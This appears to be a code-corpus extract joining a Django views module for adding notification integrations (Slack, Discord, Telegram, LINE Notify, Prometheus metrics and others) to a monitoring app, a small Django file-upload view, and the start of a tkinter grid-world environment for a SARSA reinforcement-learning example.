        return HttpResponseBadRequest()
    if request.GET.get("error") == "cancelled":
        messages.warning(request, "PagerDuty setup was cancelled.")
        return redirect("hc-channels", project.code)
    channel = Channel(kind="pd", project=project)
    channel.value = json.dumps(
        {
            "service_key": request.GET.get("service_key"),
            "account": request.GET.get("account"),
        }
    )
    channel.save()
    channel.assign_all_checks()
    messages.success(request, "The PagerDuty integration has been added!")
    return redirect("hc-channels", project.code)
@require_setting("PAGERTREE_ENABLED")
@login_required
def add_pagertree(request, code):
    """ Add a PagerTree integration to the project. """
    project = _get_rw_project_for_user(request, code)
    if request.method == "POST":
        form = forms.AddUrlForm(request.POST)
        if form.is_valid():
            channel = Channel(project=project, kind="pagertree")
            channel.value = form.cleaned_data["value"]
            channel.save()
            channel.assign_all_checks()
            return redirect("hc-channels", project.code)
    else:
        form = forms.AddUrlForm()
    ctx = {"page": "channels", "project": project, "form": form}
    return render(request, "integrations/add_pagertree.html", ctx)
@require_setting("SLACK_ENABLED")
@login_required
def add_slack(request, code):
    """ Add a Slack integration to the project via a submitted URL form. """
    project = _get_rw_project_for_user(request, code)
    if request.method == "POST":
        form = forms.AddUrlForm(request.POST)
        if form.is_valid():
            channel = Channel(project=project, kind="slack")
            channel.value = form.cleaned_data["value"]
            channel.save()

            channel.assign_all_checks()
            return redirect("hc-channels", project.code)
    else:
        form = forms.AddUrlForm()

    # Include "project" in the template context, consistent with the other
    # add_* views (the original ctx omitted it):
    ctx = {
        "page": "channels",
        "project": project,
        "form": form,
    }
    return render(request, "integrations/add_slack.html", ctx)
@require_setting("SLACK_ENABLED")
@require_setting("SLACK_CLIENT_ID")
def slack_help(request):
    """ Render the Slack integration page for anonymous visitors. """
    return render(request, "integrations/add_slack_btn.html", {"page": "channels"})
@require_setting("SLACK_ENABLED")
@require_setting("SLACK_CLIENT_ID")
@login_required
def add_slack_btn(request, code):
    """ Start the Slack OAuth flow for the project.

    Stores (state, project code) in the session; add_slack_complete checks
    the state when Slack redirects back.
    """
    project = _get_rw_project_for_user(request, code)
    state = token_urlsafe()
    authorize_url = "https://slack.com/oauth/v2/authorize?" + urlencode(
        {
            "scope": "incoming-webhook",
            "client_id": settings.SLACK_CLIENT_ID,
            "state": state,
        }
    )
    ctx = {
        "project": project,
        "page": "channels",
        "authorize_url": authorize_url,
    }
    request.session["add_slack"] = (state, str(project.code))
    return render(request, "integrations/add_slack_btn.html", ctx)
@require_setting("SLACK_ENABLED")
@require_setting("SLACK_CLIENT_ID")
@login_required
def add_slack_complete(request):
    """ Finish the Slack OAuth flow started in add_slack_btn. """
    if "add_slack" not in request.session:
        return HttpResponseForbidden()
    state, code = request.session.pop("add_slack")
    project = _get_rw_project_for_user(request, code)
    if request.GET.get("error") == "access_denied":
        messages.warning(request, "Slack setup was cancelled.")
        return redirect("hc-channels", project.code)
    # The state in the callback must match the one stored in the session:
    if request.GET.get("state") != state:
        return HttpResponseForbidden()
    # Exchange the authorization code for an access token:
    result = requests.post(
        "https://slack.com/api/oauth.v2.access",
        {
            "client_id": settings.SLACK_CLIENT_ID,
            "client_secret": settings.SLACK_CLIENT_SECRET,
            "code": request.GET.get("code"),
        },
    )
    doc = result.json()
    if doc.get("ok"):
        channel = Channel(kind="slack", project=project)
        # Store the entire OAuth response as the channel value:
        channel.value = result.text
        channel.save()
        channel.assign_all_checks()
        messages.success(request, "The Slack integration has been added!")
    else:
        s = doc.get("error")
        messages.warning(request, "Error message from slack: %s" % s)
    return redirect("hc-channels", project.code)
@require_setting("MATTERMOST_ENABLED")
@login_required
def add_mattermost(request, code):
    """ Add a Mattermost integration to the project. """
    project = _get_rw_project_for_user(request, code)
    if request.method == "POST":
        form = forms.AddUrlForm(request.POST)
        if form.is_valid():
            channel = Channel(project=project, kind="mattermost")
            channel.value = form.cleaned_data["value"]
            channel.save()
            channel.assign_all_checks()
            return redirect("hc-channels", project.code)
    else:
        form = forms.AddUrlForm()
    ctx = {"page": "channels", "form": form, "project": project}
    return render(request, "integrations/add_mattermost.html", ctx)
@require_setting("PUSHBULLET_CLIENT_ID")
@login_required
def add_pushbullet(request, code):
    """ Start the Pushbullet OAuth flow for the project.

    Stores (state, project code) in the session; add_pushbullet_complete
    checks the state when Pushbullet redirects back.
    """
    project = _get_rw_project_for_user(request, code)
    state = token_urlsafe()
    authorize_url = "https://www.pushbullet.com/authorize?" + urlencode(
        {
            "client_id": settings.PUSHBULLET_CLIENT_ID,
            "redirect_uri": settings.SITE_ROOT + reverse(add_pushbullet_complete),
            "response_type": "code",
            "state": state,
        }
    )
    ctx = {
        "page": "channels",
        "project": project,
        "authorize_url": authorize_url,
    }
    request.session["add_pushbullet"] = (state, str(project.code))
    return render(request, "integrations/add_pushbullet.html", ctx)
@require_setting("PUSHBULLET_CLIENT_ID")
@login_required
def add_pushbullet_complete(request):
    """ Finish the Pushbullet OAuth flow started in add_pushbullet. """
    if "add_pushbullet" not in request.session:
        return HttpResponseForbidden()
    state, code = request.session.pop("add_pushbullet")
    project = _get_rw_project_for_user(request, code)
    if request.GET.get("error") == "access_denied":
        messages.warning(request, "Pushbullet setup was cancelled.")
        return redirect("hc-channels", project.code)
    # The state in the callback must match the one stored in the session:
    if request.GET.get("state") != state:
        return HttpResponseForbidden()
    # Exchange the authorization code for an access token:
    result = requests.post(
        "https://api.pushbullet.com/oauth2/token",
        {
            "client_id": settings.PUSHBULLET_CLIENT_ID,
            "client_secret": settings.PUSHBULLET_CLIENT_SECRET,
            "code": request.GET.get("code"),
            "grant_type": "authorization_code",
        },
    )
    doc = result.json()
    if "access_token" in doc:
        channel = Channel(kind="pushbullet", project=project)
        channel.value = doc["access_token"]
        channel.save()
        channel.assign_all_checks()
        messages.success(request, "The Pushbullet integration has been added!")
    else:
        messages.warning(request, "Something went wrong")
    return redirect("hc-channels", project.code)
@require_setting("DISCORD_CLIENT_ID")
@login_required
def add_discord(request, code):
    """ Start the Discord OAuth flow for the project.

    Stores (state, project code) in the session; add_discord_complete
    checks the state when Discord redirects back.
    """
    project = _get_rw_project_for_user(request, code)
    state = token_urlsafe()
    auth_url = "https://discordapp.com/api/oauth2/authorize?" + urlencode(
        {
            "client_id": settings.DISCORD_CLIENT_ID,
            "scope": "webhook.incoming",
            "redirect_uri": settings.SITE_ROOT + reverse(add_discord_complete),
            "response_type": "code",
            "state": state,
        }
    )
    ctx = {"page": "channels", "project": project, "authorize_url": auth_url}
    request.session["add_discord"] = (state, str(project.code))
    return render(request, "integrations/add_discord.html", ctx)
@require_setting("DISCORD_CLIENT_ID")
@login_required
def add_discord_complete(request):
    """ Finish the Discord OAuth flow started in add_discord. """
    if "add_discord" not in request.session:
        return HttpResponseForbidden()
    state, code = request.session.pop("add_discord")
    project = _get_rw_project_for_user(request, code)
    if request.GET.get("error") == "access_denied":
        messages.warning(request, "Discord setup was cancelled.")
        return redirect("hc-channels", project.code)
    # The state in the callback must match the one stored in the session:
    if request.GET.get("state") != state:
        return HttpResponseForbidden()
    # Exchange the authorization code for an access token:
    result = requests.post(
        "https://discordapp.com/api/oauth2/token",
        {
            "client_id": settings.DISCORD_CLIENT_ID,
            "client_secret": settings.DISCORD_CLIENT_SECRET,
            "code": request.GET.get("code"),
            "grant_type": "authorization_code",
            "redirect_uri": settings.SITE_ROOT + reverse(add_discord_complete),
        },
    )
    doc = result.json()
    if "access_token" in doc:
        channel = Channel(kind="discord", project=project)
        # Store the entire OAuth response as the channel value:
        channel.value = result.text
        channel.save()
        channel.assign_all_checks()
        messages.success(request, "The Discord integration has been added!")
    else:
        messages.warning(request, "Something went wrong.")
    return redirect("hc-channels", project.code)
@require_setting("PUSHOVER_API_TOKEN")
def pushover_help(request):
    """Render the static Pushover help page."""
    return render(
        request, "integrations/add_pushover_help.html", {"page": "channels"}
    )
@require_setting("PUSHOVER_API_TOKEN")
@login_required
def add_pushover(request, code):
    """Handle the Pushover subscription round trip.

    POST starts the flow by redirecting to Pushover's subscription page.
    Pushover then redirects back here with ``pushover_user_key`` (or an
    unsubscribe flag) in the query string. A random ``state`` token kept
    in the session protects the round trip against CSRF. A plain GET
    without parameters shows the integration settings form.
    """
    project = _get_rw_project_for_user(request, code)
    if request.method == "POST":
        state = token_urlsafe()
        failure_url = settings.SITE_ROOT + reverse("hc-channels", args=[project.code])
        # Priorities chosen in the form ride along in the success URL so
        # they survive the redirect through Pushover.
        success_url = (
            settings.SITE_ROOT
            + reverse("hc-add-pushover", args=[project.code])
            + "?"
            + urlencode(
                {
                    "state": state,
                    "prio": request.POST.get("po_priority", "0"),
                    "prio_up": request.POST.get("po_priority_up", "0"),
                }
            )
        )
        subscription_url = (
            settings.PUSHOVER_SUBSCRIPTION_URL
            + "?"
            + urlencode({"success": success_url, "failure": failure_url})
        )
        request.session["pushover"] = state
        return redirect(subscription_url)
    # Handle successful subscriptions
    if "pushover_user_key" in request.GET:
        if "pushover" not in request.session:
            return HttpResponseForbidden()
        state = request.session.pop("pushover")
        if request.GET.get("state") != state:
            return HttpResponseForbidden()
        if request.GET.get("pushover_unsubscribed") == "1":
            # Unsubscription: delete all Pushover channels for this project
            Channel.objects.filter(project=project, kind="po").delete()
            return redirect("hc-channels", project.code)
        form = forms.AddPushoverForm(request.GET)
        if not form.is_valid():
            return HttpResponseBadRequest()
        channel = Channel(project=project, kind="po")
        channel.value = form.get_value()
        channel.save()
        channel.assign_all_checks()
        messages.success(request, "The Pushover integration has been added!")
        return redirect("hc-channels", project.code)
    # Show Integration Settings form
    ctx = {
        "page": "channels",
        "project": project,
        "po_retry_delay": td(seconds=settings.PUSHOVER_EMERGENCY_RETRY_DELAY),
        "po_expiration": td(seconds=settings.PUSHOVER_EMERGENCY_EXPIRATION),
    }
    return render(request, "integrations/add_pushover.html", ctx)
@require_setting("OPSGENIE_ENABLED")
@login_required
def add_opsgenie(request, code):
    """Add an Opsgenie integration: GET shows the form, POST saves it."""
    project = _get_rw_project_for_user(request, code)
    if request.method == "POST":
        form = forms.AddOpsgenieForm(request.POST)
        if form.is_valid():
            payload = {
                "region": form.cleaned_data["region"],
                "key": form.cleaned_data["key"],
            }
            channel = Channel(project=project, kind="opsgenie")
            channel.value = json.dumps(payload)
            channel.save()
            channel.assign_all_checks()
            return redirect("hc-channels", project.code)
    else:
        form = forms.AddOpsgenieForm()
    return render(
        request,
        "integrations/add_opsgenie.html",
        {"page": "channels", "project": project, "form": form},
    )
@require_setting("VICTOROPS_ENABLED")
@login_required
def add_victorops(request, code):
    """Add a VictorOps (Splunk On-Call) webhook URL as a channel."""
    project = _get_rw_project_for_user(request, code)
    if request.method == "POST":
        form = forms.AddUrlForm(request.POST)
        if form.is_valid():
            channel = Channel(project=project, kind="victorops")
            channel.value = form.cleaned_data["value"]
            channel.save()
            channel.assign_all_checks()
            return redirect("hc-channels", project.code)
    else:
        form = forms.AddUrlForm()
    ctx = {"page": "channels", "project": project, "form": form}
    return render(request, "integrations/add_victorops.html", ctx)
@require_setting("ZULIP_ENABLED")
@login_required
def add_zulip(request, code):
    """Add a Zulip integration: GET shows the form, POST saves it."""
    project = _get_rw_project_for_user(request, code)
    if request.method == "POST":
        form = forms.AddZulipForm(request.POST)
        if form.is_valid():
            channel = Channel(project=project, kind="zulip")
            channel.value = form.get_value()
            channel.save()
            channel.assign_all_checks()
            return redirect("hc-channels", project.code)
    else:
        form = forms.AddZulipForm()
    ctx = {"page": "channels", "project": project, "form": form}
    return render(request, "integrations/add_zulip.html", ctx)
@csrf_exempt
@require_POST
def telegram_bot(request):
    """Webhook endpoint for the Telegram bot.

    On a "/start" message, replies in the chat with a signed invite link
    that lets the chat be registered as a notification channel.
    """
    try:
        doc = json.loads(request.body.decode())
        jsonschema.validate(doc, telegram_callback)
    except ValueError:
        return HttpResponseBadRequest()
    except jsonschema.ValidationError:
        # We don't recognize the message format, but don't want Telegram
        # retrying this over and over again, so respond with 200 OK
        return HttpResponse()
    if "/start" not in doc["message"]["text"]:
        return HttpResponse()
    chat = doc["message"]["chat"]
    # max() of two strings compares lexicographically; since one of
    # title/username is typically "", this picks the non-empty value.
    # NOTE(review): when both are non-empty this picks the alphabetically
    # larger one -- confirm that is the intended preference.
    name = max(chat.get("title", ""), chat.get("username", ""))
    # The invite link carries the chat details as a signed payload, so
    # add_telegram can trust them without a database round trip.
    invite = render_to_string(
        "integrations/telegram_invite.html",
        {"qs": signing.dumps((chat["id"], chat["type"], name))},
    )
    Telegram.send(chat["id"], invite)
    return HttpResponse()
@require_setting("TELEGRAM_TOKEN")
def telegram_help(request):
    """Render the Telegram setup instructions page."""
    ctx = {
        "page": "channels",
        "bot_name": settings.TELEGRAM_BOT_NAME,
    }
    return render(request, "integrations/add_telegram.html", ctx)
@require_setting("TELEGRAM_TOKEN")
@login_required
def add_telegram(request):
    """Finish Telegram setup from a signed invite link.

    The query string (produced by telegram_bot) is a signed payload with
    the chat id, type and name; GET shows a project picker, POST saves
    the channel in the chosen project.
    """
    chat_id, chat_type, chat_name = None, None, None
    qs = request.META["QUERY_STRING"]
    if qs:
        try:
            # Links are only valid for 10 minutes (max_age=600).
            chat_id, chat_type, chat_name = signing.loads(qs, max_age=600)
        except signing.BadSignature:
            return render(request, "bad_link.html")
    if request.method == "POST":
        project = _get_rw_project_for_user(request, request.POST.get("project"))
        channel = Channel(project=project, kind="telegram")
        # NOTE(review): on a POST without a query string the chat fields
        # are still None here and get saved as nulls -- confirm intended.
        channel.value = json.dumps(
            {"id": chat_id, "type": chat_type, "name": chat_name}
        )
        channel.save()
        channel.assign_all_checks()
        messages.success(request, "The Telegram integration has been added!")
        return redirect("hc-channels", project.code)
    ctx = {
        "page": "channels",
        "projects": request.profile.projects(),
        "chat_id": chat_id,
        "chat_type": chat_type,
        "chat_name": chat_name,
        "bot_name": settings.TELEGRAM_BOT_NAME,
    }
    return render(request, "integrations/add_telegram.html", ctx)
@require_setting("TWILIO_AUTH")
@login_required
def add_sms(request, code):
    """Add an SMS (Twilio) notification channel to the project."""
    project = _get_rw_project_for_user(request, code)
    if request.method == "POST":
        form = forms.PhoneNumberForm(request.POST)
        if form.is_valid():
            channel = Channel(project=project, kind="sms")
            channel.name = form.cleaned_data["label"]
            channel.value = form.get_json()
            channel.save()
            channel.assign_all_checks()
            return redirect("hc-channels", project.code)
    else:
        form = forms.PhoneNumberForm()
    # The owner's profile is needed in the template for SMS quota info.
    ctx = {
        "page": "channels",
        "project": project,
        "form": form,
        "profile": project.owner_profile,
    }
    return render(request, "integrations/add_sms.html", ctx)
@require_setting("TWILIO_AUTH")
@login_required
def add_call(request, code):
    """Add a phone-call (Twilio) notification channel to the project."""
    project = _get_rw_project_for_user(request, code)
    if request.method == "POST":
        form = forms.PhoneNumberForm(request.POST)
        if form.is_valid():
            channel = Channel(project=project, kind="call")
            channel.name = form.cleaned_data["label"]
            channel.value = form.get_json()
            channel.save()
            channel.assign_all_checks()
            return redirect("hc-channels", project.code)
    else:
        form = forms.PhoneNumberForm()
    ctx = {
        "page": "channels",
        "project": project,
        "form": form,
        "profile": project.owner_profile,
    }
    return render(request, "integrations/add_call.html", ctx)
@require_setting("TWILIO_USE_WHATSAPP")
@login_required
def add_whatsapp(request, code):
    """Add a WhatsApp (Twilio) notification channel to the project."""
    project = _get_rw_project_for_user(request, code)
    if request.method == "POST":
        form = forms.PhoneUpDownForm(request.POST)
        if form.is_valid():
            channel = Channel(project=project, kind="whatsapp")
            channel.name = form.cleaned_data["label"]
            channel.value = form.get_json()
            channel.save()
            channel.assign_all_checks()
            return redirect("hc-channels", project.code)
    else:
        form = forms.PhoneUpDownForm()
    ctx = {
        "page": "channels",
        "project": project,
        "form": form,
        "profile": project.owner_profile,
    }
    return render(request, "integrations/add_whatsapp.html", ctx)
@require_setting("SIGNAL_CLI_ENABLED")
@login_required
def add_signal(request, code):
    """Add a Signal notification channel to the project."""
    project = _get_rw_project_for_user(request, code)
    if request.method == "POST":
        form = forms.PhoneUpDownForm(request.POST)
        if form.is_valid():
            channel = Channel(project=project, kind="signal")
            channel.name = form.cleaned_data["label"]
            channel.value = form.get_json()
            channel.save()
            channel.assign_all_checks()
            return redirect("hc-channels", project.code)
    else:
        form = forms.PhoneUpDownForm()
    ctx = {
        "page": "channels",
        "project": project,
        "form": form,
        "profile": project.owner_profile,
    }
    return render(request, "integrations/add_signal.html", ctx)
@require_setting("TRELLO_APP_KEY")
@login_required
def add_trello(request, code):
    """Add a Trello integration.

    GET shows a page with a Trello authorization link; after the user
    authorizes, the page POSTs the board/list selection back here.
    """
    project = _get_rw_project_for_user(request, code)
    if request.method == "POST":
        form = forms.AddTrelloForm(request.POST)
        if not form.is_valid():
            return HttpResponseBadRequest()
        channel = Channel(project=project, kind="trello")
        channel.value = form.get_value()
        channel.save()
        channel.assign_all_checks()
        return redirect("hc-channels", project.code)
    return_url = settings.SITE_ROOT + reverse("hc-add-trello", args=[project.code])
    authorize_url = "https://trello.com/1/authorize?" + urlencode(
        {
            "expiration": "never",
            "name": settings.SITE_NAME,
            "scope": "read,write",
            "response_type": "token",
            "key": settings.TRELLO_APP_KEY,
            "return_url": return_url,
        }
    )
    ctx = {
        "page": "channels",
        "project": project,
        "authorize_url": authorize_url,
    }
    return render(request, "integrations/add_trello.html", ctx)
@require_setting("MATRIX_ACCESS_TOKEN")
@login_required
def add_matrix(request, code):
    """Add a Matrix room as a notification channel."""
    project = _get_rw_project_for_user(request, code)
    if request.method == "POST":
        form = forms.AddMatrixForm(request.POST)
        if form.is_valid():
            channel = Channel(project=project, kind="matrix")
            channel.value = form.cleaned_data["room_id"]
            # If user supplied room alias instead of ID, use it as channel name
            alias = form.cleaned_data["alias"]
            if not alias.startswith("!"):
                channel.name = alias
            channel.save()
            channel.assign_all_checks()
            messages.success(request, "The Matrix integration has been added!")
            return redirect("hc-channels", project.code)
    else:
        form = forms.AddMatrixForm()
    ctx = {
        "page": "channels",
        "project": project,
        "form": form,
        "matrix_user_id": settings.MATRIX_USER_ID,
    }
    return render(request, "integrations/add_matrix.html", ctx)
@require_setting("APPRISE_ENABLED")
@login_required
def add_apprise(request, code):
    """Add an Apprise URL as a notification channel."""
    project = _get_rw_project_for_user(request, code)
    if request.method == "POST":
        form = forms.AddAppriseForm(request.POST)
        if form.is_valid():
            channel = Channel(project=project, kind="apprise")
            channel.value = form.cleaned_data["url"]
            channel.save()
            channel.assign_all_checks()
            messages.success(request, "The Apprise integration has been added!")
            return redirect("hc-channels", project.code)
    else:
        form = forms.AddAppriseForm()
    ctx = {"page": "channels", "project": project, "form": form}
    return render(request, "integrations/add_apprise.html", ctx)
@require_setting("TRELLO_APP_KEY")
@login_required
@require_POST
def trello_settings(request):
    """Return an HTML fragment listing the user's open Trello boards/lists.

    Called over AJAX from the "Add Trello" page after the user authorizes
    the app and supplies a token.
    """
    token = request.POST.get("token")
    url = "https://api.trello.com/1/members/me/boards?" + urlencode(
        {
            "key": settings.TRELLO_APP_KEY,
            "token": token,
            "filter": "open",
            "fields": "id,name",
            "lists": "open",
            "list_fields": "id,name",
        }
    )
    # Fix: requests has no default timeout, so a slow/unresponsive Trello
    # API could previously hang this worker indefinitely.
    boards = requests.get(url, timeout=30).json()
    num_lists = sum(len(board["lists"]) for board in boards)
    ctx = {"token": token, "boards": boards, "num_lists": num_lists}
    return render(request, "integrations/trello_settings.html", ctx)
@require_setting("MSTEAMS_ENABLED")
@login_required
def add_msteams(request, code):
    """Add a Microsoft Teams webhook URL as a notification channel."""
    project = _get_rw_project_for_user(request, code)
    if request.method == "POST":
        form = forms.AddUrlForm(request.POST)
        if form.is_valid():
            channel = Channel(project=project, kind="msteams")
            channel.value = form.cleaned_data["value"]
            channel.save()
            channel.assign_all_checks()
            return redirect("hc-channels", project.code)
    else:
        form = forms.AddUrlForm()
    ctx = {"page": "channels", "project": project, "form": form}
    return render(request, "integrations/add_msteams.html", ctx)
@require_setting("PROMETHEUS_ENABLED")
@login_required
def add_prometheus(request, code):
    """Show the Prometheus scrape-endpoint instructions page.

    Read-only project access is sufficient here, so the rw flag from
    _get_project_for_user is intentionally unused.
    """
    project, rw = _get_project_for_user(request, code)
    ctx = {"page": "channels", "project": project}
    return render(request, "integrations/add_prometheus.html", ctx)
@require_setting("PROMETHEUS_ENABLED")
def metrics(request, code, key):
    """Export check statuses in the Prometheus text exposition format.

    Authenticated via the project's read-only API key embedded in the
    URL. The body is produced by a generator so the response streams.
    """
    if len(key) != 32:
        return HttpResponseBadRequest()
    q = Project.objects.filter(code=code, api_key_readonly=key)
    try:
        project = q.get()
    except Project.DoesNotExist:
        return HttpResponseForbidden()
    checks = Check.objects.filter(project_id=project.id).order_by("id")
    def esc(s):
        # Escape backslash, double quote and newline in label values, as
        # required by the Prometheus text format.
        return s.replace("\\", "\\\\").replace('"', '\\"').replace("\n", "\\n")
    def output(checks):
        yield "# HELP hc_check_up Whether the check is currently up (1 for yes, 0 for no).\n"
        yield "# TYPE hc_check_up gauge\n"
        TMPL = """hc_check_up{name="%s", tags="%s", unique_key="%s"} %d\n"""
        for check in checks:
            value = 0 if check.get_status() == "down" else 1
            yield TMPL % (esc(check.name), esc(check.tags), check.unique_key, value)
        tags_statuses, num_down = _tags_statuses(checks)
        yield "\n"
        yield "# HELP hc_tag_up Whether all checks with this tag are up (1 for yes, 0 for no).\n"
        yield "# TYPE hc_tag_up gauge\n"
        TMPL = """hc_tag_up{tag="%s"} %d\n"""
        for tag in sorted(tags_statuses):
            value = 0 if tags_statuses[tag] == "down" else 1
            yield TMPL % (esc(tag), value)
        yield "\n"
        yield "# HELP hc_checks_total The total number of checks.\n"
        yield "# TYPE hc_checks_total gauge\n"
        yield "hc_checks_total %d\n" % len(checks)
        yield "\n"
        yield "# HELP hc_checks_down_total The number of checks currently down.\n"
        yield "# TYPE hc_checks_down_total gauge\n"
        yield "hc_checks_down_total %d\n" % num_down
    return HttpResponse(output(checks), content_type="text/plain")
@require_setting("SPIKE_ENABLED")
@login_required
def add_spike(request, code):
    """Add a Spike.sh webhook URL as a notification channel."""
    project = _get_rw_project_for_user(request, code)
    if request.method == "POST":
        form = forms.AddUrlForm(request.POST)
        if form.is_valid():
            channel = Channel(project=project, kind="spike")
            channel.value = form.cleaned_data["value"]
            channel.save()
            channel.assign_all_checks()
            return redirect("hc-channels", project.code)
    else:
        form = forms.AddUrlForm()
    ctx = {"page": "channels", "project": project, "form": form}
    return render(request, "integrations/add_spike.html", ctx)
@require_setting("LINENOTIFY_CLIENT_ID")
@login_required
def add_linenotify(request, code):
    """Show the "Add LINE Notify" page with an OAuth2 authorization link.

    Stores a random ``state`` token (with the target project's code) in
    the session; add_linenotify_complete later checks it to protect the
    OAuth2 callback against CSRF.
    """
    project = _get_rw_project_for_user(request, code)
    state = token_urlsafe()
    # Fix: the URL previously started with a stray leading space
    # (" https://..."), which produced an invalid authorization link.
    authorize_url = "https://notify-bot.line.me/oauth/authorize?" + urlencode(
        {
            "client_id": settings.LINENOTIFY_CLIENT_ID,
            "redirect_uri": settings.SITE_ROOT + reverse(add_linenotify_complete),
            "response_type": "code",
            "state": state,
            "scope": "notify",
        }
    )
    ctx = {
        "page": "channels",
        "project": project,
        "authorize_url": authorize_url,
    }
    request.session["add_linenotify"] = (state, str(project.code))
    return render(request, "integrations/add_linenotify.html", ctx)
@require_setting("LINENOTIFY_CLIENT_ID")
@login_required
def add_linenotify_complete(request):
    """OAuth2 callback for the LINE Notify integration.

    Validates the session ``state`` token, exchanges the authorization
    code for an access token, fetches the notification target's name and
    saves both as a new channel.
    """
    if "add_linenotify" not in request.session:
        return HttpResponseForbidden()
    state, code = request.session.pop("add_linenotify")
    # CSRF check: the state we receive must match the one we stored.
    if request.GET.get("state") != state:
        return HttpResponseForbidden()
    project = _get_rw_project_for_user(request, code)
    if request.GET.get("error") == "access_denied":
        messages.warning(request, "LINE Notify setup was cancelled.")
        return redirect("hc-channels", project.code)
    # Exchange code for access token
    # NOTE(review): these HTTP calls have no timeout and can block the
    # worker if the LINE API stalls -- consider adding timeout=.
    result = requests.post(
        "https://notify-bot.line.me/oauth/token",
        {
            "grant_type": "authorization_code",
            "code": request.GET.get("code"),
            "redirect_uri": settings.SITE_ROOT + reverse(add_linenotify_complete),
            "client_id": settings.LINENOTIFY_CLIENT_ID,
            "client_secret": settings.LINENOTIFY_CLIENT_SECRET,
        },
    )
    doc = result.json()
    if doc.get("status") != 200:
        messages.warning(request, "Something went wrong.")
        return redirect("hc-channels", project.code)
    # Fetch notification target's name, will use it as channel name:
    token = doc["access_token"]
    result = requests.get(
        "https://notify-api.line.me/api/status",
        headers={"Authorization": "Bearer %s" % token},
    )
    doc = result.json()
    channel = Channel(kind="linenotify", project=project)
    channel.name = doc.get("target")
    channel.value = token
    channel.save()
    channel.assign_all_checks()
    messages.success(request, "The LINE Notify integration has been added!")
    return redirect("hc-channels", project.code)
# Forks: add custom views after this line
| 31.373307 | 97 | 0.642458 |
acf6d809178b7da496efc97fb884b54fabb14dbc | 2,237 | py | Python | src/files/views.py | raonyguimaraes/OncoX | f2fe6e9a786fd81f7933c8a54beef948e8527604 | [
"MIT"
] | null | null | null | src/files/views.py | raonyguimaraes/OncoX | f2fe6e9a786fd81f7933c8a54beef948e8527604 | [
"MIT"
] | null | null | null | src/files/views.py | raonyguimaraes/OncoX | f2fe6e9a786fd81f7933c8a54beef948e8527604 | [
"MIT"
] | null | null | null | from django.shortcuts import render
from django.http import HttpResponse
from django.contrib.auth.decorators import login_required
import json
import os
from forms import FileForm
from models import File
def response_mimetype(request):
    """Pick the response content type based on the request's Accept header."""
    accepts = request.META['HTTP_ACCEPT']
    return "application/json" if "application/json" in accepts else "text/plain"
class JSONResponse(HttpResponse):
    """JSON response class."""
    # Serializes `obj` to JSON and passes it to HttpResponse.
    # NOTE(review): `mimetype` is forwarded as the second positional
    # argument of HttpResponse, which matches old Django versions only;
    # newer Django expects content_type= -- confirm the Django version.
    def __init__(self,obj='',json_opts={},mimetype="application/json",*args,**kwargs):
        content = json.dumps(obj,**json_opts)
        super(JSONResponse,self).__init__(content,mimetype,*args,**kwargs)
@login_required
def create(request):
    """Handle jQuery-File-Upload style uploads.

    GET renders the upload form; POST saves the uploaded file under the
    current user and returns the JSON payload the upload widget expects.
    (Debug ``print`` statements and dead commented-out code removed; the
    local previously named ``file`` no longer shadows the builtin.)
    """
    if request.method == 'POST':
        form = FileForm(request.POST, request.FILES)
        if form.is_valid():
            # Create the record first, then attach the uploaded content.
            file_obj = File.objects.create(user=request.user)
            file_obj.file = request.FILES.get('file')
            # Use the file name without its extension as the record name.
            file_obj.name = str(os.path.splitext(file_obj.file.name)[0])
            file_obj.user = request.user
            file_obj.save()
            f = file_obj.file
            # Response format expected by the jQuery-File-Upload widget.
            data = {'files': [{'deleteType': 'DELETE', 'name': file_obj.name,
                               'url': '', 'thumbnailUrl': '',
                               'type': 'image/png', 'deleteUrl': '',
                               'size': f.size}]}
            response = JSONResponse(data, mimetype=response_mimetype(request))
            response['Content-Disposition'] = 'inline; filename=files.json'
            return response
    else:
        form = FileForm()
    # Invalid POST falls through here and re-renders with the bound form.
    return render(request, 'files/create.html', {'form': form})
# NOTE(review): this view shadows the builtin `list`; renaming it would
# require updating the URLconf, so it is documented rather than changed.
def list(request):
    """Render the index page with all uploaded files."""
    files = File.objects.all()
    return render(request, 'files/index.html', {"files": files})
acf6d819177b6dd97714ea4ae8915c91db2a073b | 4,802 | py | Python | 1-grid-world/4-sarsa/environment.py | kyuhyoung/reinforcement-learning | 8c7f56be786bdcb6244bdcf79c2ae7f6a6c3f5c1 | [
"MIT"
] | 3,220 | 2017-04-16T02:01:42.000Z | 2022-03-30T13:57:38.000Z | 1-grid-world/4-sarsa/environment.py | kyuhyoung/reinforcement-learning | 8c7f56be786bdcb6244bdcf79c2ae7f6a6c3f5c1 | [
"MIT"
] | 72 | 2017-04-15T22:54:21.000Z | 2022-02-09T23:26:59.000Z | 1-grid-world/4-sarsa/environment.py | kyuhyoung/reinforcement-learning | 8c7f56be786bdcb6244bdcf79c2ae7f6a6c3f5c1 | [
"MIT"
] | 801 | 2017-04-16T05:42:03.000Z | 2022-03-31T02:24:46.000Z | import time
import numpy as np
import tkinter as tk
from PIL import ImageTk, Image
# Fixed random seed for reproducible runs.
np.random.seed(1)
# Shorthand for creating tkinter-compatible images from PIL.
PhotoImage = ImageTk.PhotoImage
UNIT = 100 # pixels
HEIGHT = 5 # grid height
WIDTH = 5 # grid width
class Env(tk.Tk):
    """5x5 grid-world environment for the SARSA agent, drawn with tkinter.

    The agent (rectangle) starts at the top-left cell. Stepping onto a
    triangle yields reward -100 and ends the episode; the circle yields
    +100. Each cell is UNIT pixels wide; canvas coordinates refer to the
    center of a cell, so cell (0, 0) is at pixel (50, 50).
    """
    def __init__(self):
        super(Env, self).__init__()
        self.action_space = ['u', 'd', 'l', 'r']
        self.n_actions = len(self.action_space)
        self.title('SARSA')
        self.geometry('{0}x{1}'.format(HEIGHT * UNIT, HEIGHT * UNIT))
        self.shapes = self.load_images()
        self.canvas = self._build_canvas()
        # Canvas text ids for the q-value overlay, cleared on each redraw.
        self.texts = []
    def _build_canvas(self):
        """Create the canvas, draw grid lines and place the four sprites."""
        canvas = tk.Canvas(self, bg='white',
                           height=HEIGHT * UNIT,
                           width=WIDTH * UNIT)
        # create grids
        for c in range(0, WIDTH * UNIT, UNIT):  # 0~400 by 80
            x0, y0, x1, y1 = c, 0, c, HEIGHT * UNIT
            canvas.create_line(x0, y0, x1, y1)
        for r in range(0, HEIGHT * UNIT, UNIT):  # 0~400 by 80
            x0, y0, x1, y1 = 0, r, HEIGHT * UNIT, r
            canvas.create_line(x0, y0, x1, y1)
        # add img to canvas
        self.rectangle = canvas.create_image(50, 50, image=self.shapes[0])
